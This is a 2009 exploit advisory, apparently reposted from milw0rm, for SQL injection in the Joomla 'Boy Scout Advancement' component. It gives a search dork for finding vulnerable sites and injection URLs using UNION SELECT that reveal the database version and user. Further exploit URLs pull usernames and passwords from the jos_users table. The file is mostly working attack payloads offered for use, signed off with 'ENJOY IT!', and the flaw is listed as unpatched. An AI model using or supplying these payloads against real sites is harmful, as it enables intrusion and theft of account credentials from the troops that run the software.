Joomla Boy Scout Advancement 0.3 id SQL Injection Exploit by h3m4n

VIEWS: 125 PAGES: 3

									                       Joomla Boy Scout Advancement 0.3 id SQL Injection Exploit                            Page 1/3
  1    ***********************************************************************************************
  2    ***********************************************************************************************
  3    **                                                                                           **
  4    **                                                                                           **
  5    **     [] [] [] [][][][> []       [] [][ ][]       []   [][]] [] [> [][][][> [][][][]        **
  6    **     || || || []         [][]   []   [] []      []   []      [] []   []        []    []    **
  7    ** [> [][][][] [][][][> [] [] []       [] []    [][] []        [][]    [][][][> []     []    **
  8    ** [−−−−−[]−−−−−[][][][>−−[]−−[]−[]−−−[][][]−−[]−[]−−[]−−−−−−−−[]−−−−−[][][][>−−[][][][]−−−\
  9    **==[>    []     []        []   [][]   [] [] [][][] []         [][]    []           [] [] >>−−
  10   ** [−−−−[[]]−−−−[]−−− −−−−[]−−−−−[]−−−[]−−[]−−−−−[]−−[]−−−−−−−[] []−−−[]−−−−−−−−−−[]−−[]−−−/
  11      [>   [[[]]]   [][][][> [][]    [] [][[] [[]] [][] [][][] [] [> [][][][> <][]        []    **
  12   **                                                                                           **
  13   **                                                                                           **
  14   **                          ¡VIVA SPAIN!...¡GANAREMOS EL MUNDIAL!...o.O                       **
  15   **                                      ¡PROUD TO BE SPANISH!                               **
  16   **                                                                                           **
  17   ***********************************************************************************************
  18   ***********************************************************************************************
  19
  20   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  21   |                                MULTIPLE SQL INJECTION VULNERABILITIES                      |
  22   |−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−|
  23   |                   | Joomla Component ’Boy Scout Advancement’ <= v−0.3 (com_bsadv) |        |
  24   |CMS INFORMATION:    −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−         |
  25   |                                                                                            |
  26   |−−>WEB: http://bsadv.sourceforge.net/                                                       |
  27   |−−>DOWNLOAD: http://bsadv.sourceforge.net/                                                  |
  28   |−−>DEMO: N/A                                                                                |
  29   |−−>CATEGORY: Joomla/Component                                                               |
  30   |−−>DESCRIPTION: BSAdv is a Joomla 1.5 component for Boy Scout unit data and advancement     |
  31   |               data for Boy Scout Troops in the United States...                            |
  32   |−−>RELEASED: 2009−02−01                                                                     |
  33   |                                                                                            |
  34   |CMS VULNERABILITY:                                                                          |
  35   |                                                                                            |
  36   |−−>TESTED ON: firefox 3                                                                     |
  37   |−−>DORK −−> inurl:"?option=com_bsadv"                                                       |
  38   |−−>CATEGORY: SQL INJECTION                                                                  |
  39   |−−>AFFECT VERSION: <= 0.3                                                                   |
  40   |−−>Discovered Bug date: 2009−05−25                                                          |
  41   |−−>Reported Bug date: 2009−05−25                                                            |
  42   |−−>Fixed bug date: Not fixed                                                                |
  43   |−−>Info patch: Not fixed                                                                    |
  44   |−−>Author: YEnH4ckEr                                                                        |
  45   |−−>mail: y3nh4ck3r[at]gmail[dot]com                                                         |
  46   |−−>WEB/BLOG: N/A                                                                            |
  47   |−−>COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.       |
  48   |−−>EXTRA−COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)                      |
  49   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  50
  51
  52   ############################
YEnH4ckEr                                                                                                   05/26/2009
                        Joomla Boy Scout Advancement 0.3 id SQL Injection Exploit                                  Page 2/3
  53    ///////////////////////////
  54
  55    SQL INJECTION VULNS (SQLi):
  56
  57    ///////////////////////////
  58    ############################
  59
  60
  61
  62    <<<<−−−−−−−−−++++++++++++++ Condition: magic quotes=OFF/ON +++++++++++++++++−−−−−−−−−>>>>
  63
  64
  65
  66    −−−−−−−−−−−−−−−−−−−
  67    PROOFS OF CONCEPT:
  68    −−−−−−−−−−−−−−−−−−−
  69
  70
  71
  72    [++] GET var −−> ’id’
  73
  74
  75    ~~~~> http://[HOST]/[PATH]/index.php?option=com_bsadv&controller=peruse&task=event&id=−1+UNION+ALL+SELECT+1,version()
        ,database(),user()%23
  76
  77
  78    [++] GET var −−> ’id’
  79
  80
  81    ~~~~> http://[HOST]/[PATH]/index.php?option=com_bsadv&controller=peruse&task=account&id=−1+UNION+ALL+SELECT+database(
        ),version()%23&Itemid=57
  82
  83
  84
  85    [++[Return]++] ~~~~~> User, version or database.
  86
  87
  88
  89    −−−−−−−−−−−
  90    EXPLOITS:
  91    −−−−−−−−−−−
  92
  93
  94
  95    ~~~~> http://[HOST]/[PATH]/index.php?option=com_bsadv&controller=peruse&task=event&id=−1+UNION+ALL+SELECT+1,concat(us
        ername,0x3A3A3A,password),3,4+FROM+jos_users+WHERE+id=62%23
  96
  97
  98
  99    [++[Return]++] ~~~~~> Username:::password id=62
  100
  101

YEnH4ckEr                                                                                                           05/26/2009
                        Joomla Boy Scout Advancement 0.3 id SQL Injection Exploit                                  Page 3/3
  102
  103   ~~~~> http://[HOST]/[PATH]/index.php?option=com_bsadv&controller=peruse&task=account&id=−1+UNION+ALL+SELECT+username,
        password+FROM+jos_users+WHERE+id=62%23&Itemid=57
  104
  105
  106
  107   [++[Return]++] ~~~~~> Username and password id=62
  108
  109
  110
  111
  112   <<<−−−−−−−−−−−−−−−−−−−−−−−−−−−−−EOF−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−>>>ENJOY IT!
  113
  114
  115
  116   #######################################################################
  117   #######################################################################
  118   ##*******************************************************************##
  119   ## SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)! ##
  120   ##*******************************************************************##
  121   ##−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−##
  122   ##*******************************************************************##
  123   ## GREETZ TO: JosS, Ulises2k, J.McCray and Spanish Hack3Rs community!##
  124   ##*******************************************************************##
  125   #######################################################################
  126   #######################################################################
  127
  128   # milw0rm.com [2009−05−26]




YEnH4ckEr                                                                                                           05/26/2009

								
To top